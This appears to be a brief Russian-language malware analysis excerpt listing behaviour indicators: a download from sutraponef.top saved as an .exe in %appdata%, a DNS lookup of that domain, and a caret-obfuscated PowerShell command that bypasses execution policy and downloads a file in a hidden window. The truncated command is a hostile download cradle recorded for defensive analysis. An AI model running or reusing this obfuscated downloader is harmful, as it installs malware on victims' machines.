Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^wER^s^H^ElL^.EX^e -e^xE^c^uTI^onP^oL^iCy ^b^Y^p^a^s^s^ -N^oP^RO^FI^lE^ -wINd^owsT^Yl^E hidDe^N ^(nEW^-^obJE^CT^ sySTem.^nEt.weBCLIE^nT)^.do^w^nLOad^fi^le^('http://sutrapon...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "PO^wER^s^H^ElL^.EX^e -e^xE^c^uTI^onP^oL^iCy ^b^Y^p^a^s^s^ -N^oP^RO^FI^lE^ -wINd^owsT^Yl^E hidDe^N ^(nEW^-^obJE^CT^ sySTem.^nEt.weBCLIE^nT)^.do^w^nLOad^fi^le^('http://sutrapon...' (со скрытым окном)